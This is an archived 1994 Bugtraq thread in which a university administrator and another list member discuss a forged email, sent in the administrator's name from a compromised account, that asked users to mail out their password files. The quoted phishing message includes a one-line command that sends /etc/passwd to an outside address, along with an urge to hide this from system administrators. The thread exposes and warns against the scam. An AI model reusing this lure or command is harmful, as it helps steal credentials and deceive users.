Re: Stupid crackers exploiting stupid users

[vanepp () sfu ca (Peter Van Epp)]

        I expect that what I have to do with this is being seen as assisting 
the idiot that is doing this in his endevour to no longer be an SFU student.
I say seen, because in the normal case (and probably this one) they manage
to spend enough time attempting to break in to our systems (or on IRC) that 
they flunk without me doing anything further. The account used on helix.net is
compromised. Their systems people have been and are aware that their system
is compromised (as is CERT).
        So far the title has not been justified, of the 250+ complaints
(some such as this one, more reasonable and/or printable than others) only
4 of them have contained password files (and 2 of those don't count, since
one was helix's from the compromised account, and one was a shadowed one
with no passwords). I of course sent the suggestion back to all except 
helix (with a copy to root at the site) that forwarding the email to their
sys admin seems a lot more reasonable action than sending me their site's
password file (even if I seemed to have asked for it).

Peter Van Epp / Operations and Technical Support 
Simon Fraser University, Burnaby, B.C. Canada


> > From: "Douglas R. Floyd" <dfloyd () paris eng utsa edu>
> > Message-Id: <9410230054.ZM10281 () paris eng utsa edu>
> > Date: Sun, 23 Oct 1994 00:54:14 -0500
> > To: bugtraq () crimelab com
> > Subject: Another request for passwords
>
> > I got this in the mail today (10-23).
> > Seems like someone is knocking on io.com now.
>
> This appears to be a forged attempt to mailbomb someone else.  If you
> read the headers carefully, you'll see that SFU appears in only the
> From: header - the letter comes from helix.net and has a helix.net
> Message-ID.  And when I looked at vanepp () sfu ca....
>
>       [Thunder] 2> telnet whistler.sfu.ca smtp
>       Trying 142.58.103.1 ...
>       Connected to whistler.sfu.ca.
>       Escape character is '^]'.
>       220-whistler.sfu.ca Sendmail 8.6.8/SFU-2.6H ready at Sun, 23 Oct 1994
>       05:10:36 -0700
>       220 ESMTP spoken here
>       expn vanepp
>       503 I demand that you introduce yourself first
> (Hmmm, well, shrug-okay...)
>       helo thunder.mcrcim.mcgill.edu
>       250 whistler.sfu.ca Hello xxxx () xxxx xxxx xxxx [xxx.xxx.x.xx], pleased to meet you
>       expn vanepp
>       250 Peter Van Epp <vanepp () whistler sfu ca>
>       quit
>       221 whistler.sfu.ca closing connection
>       Connection closed by foreign host.
>
> Okay, Peter Van Epp exists.
>
>       [Thunder] 3> finger vanepp () whistler sfu ca      
>       [whistler.sfu.ca]
>       X.500 Finger Service...
>       One exact match found for "vanepp":
>       "Peter Van Epp, Computing Services, Simon Fraser University"
>         Also known as:   
>                           Peter Van Epp
>         Mailbox Information:
>                           internet : vanepp () sfu ca
>                           internet : peter_van_epp () sfu ca
>         User Class:      
>                           staff
>
> Computing Services?  "staff"?  A staff person at SFU surely knows
> better than to send out this piece of stupidity, especially since "expn
> root" informs me that vanepp is one of nine people who get root's mail.
>
> So I think someone on helix.net originated this, probably the person
> responsible for the first piece of stupidity.  What vanepp has to do
> with it I have trouble imagining; I would suspect that sfu.ca had been
> cracked and vanepp's .forward file replaced to point to the real
> culprit, but EXPN and VRFY on whistler's SMTP server don't give me that
> impression.
>
> I suppose it's _possible_ that Peter Van Epp _is_ the person
> responsible and that the mail was forged from his account on helix.net,
> but that seems extremely unlikely.
>
> I'm sending a copy to root () sfu ca so that (a) vanepp probably gets it,
> and (b) if vanepp's mail is being stolen somehow that I can't see
> through VRFY and EXPN, the other roots there can deal with it.
>
> For those who haven't yet seen it, here's the message as quoted by
> dfloyd:
>
> > BEGIN FUNKY MESSAGE --------
> >
> > From vanepp () sfu ca  Sun Oct 23 00:00:56 1994
> > Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
> > (931110.SGI/930416.SGI.AUTO)
> >         for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
> > Received: from trance.helix.net
> >         by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
> >         id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
> > From: vanepp () sfu ca
> > Received: from  (helix.net [142.231.37.2]) by trance.helix.net
> > (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
> > dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700
> > Message-Id: <199410230433.VAA07859 () trance helix net>
> > Date: Sat, 22 Oct 1994 14:22:25
> > To: dfloyd () pentagon io com
> > Subject: Very Important
> > Status: RO
> >
> > Dear user,
> >
> >     It is imperative that I attain your /etc/passwd file
> > immediately.  It is for security reasons.  You can mail
> > it to me by typing:
> >
> >             mail vanepp () sfu ca < /etc/passwd
> >
> > Do not tell your system administrator.  I am
> > conducting an investigation on your system.  Thank you
> >
> > Your identity will be kept confidential.  I guarantee it
> >
> > Thank you for your cooperation.
> >
> > Peter Van Epp      Technical Systems Operations
> >                    CERT Security Advisor
> >                    vanepp () sfu ca
> >
> >
> > END FUNKY MESSAGE -----
>
>                                       der Mouse
>
>                           mouse () collatz mcrcim mcgill edu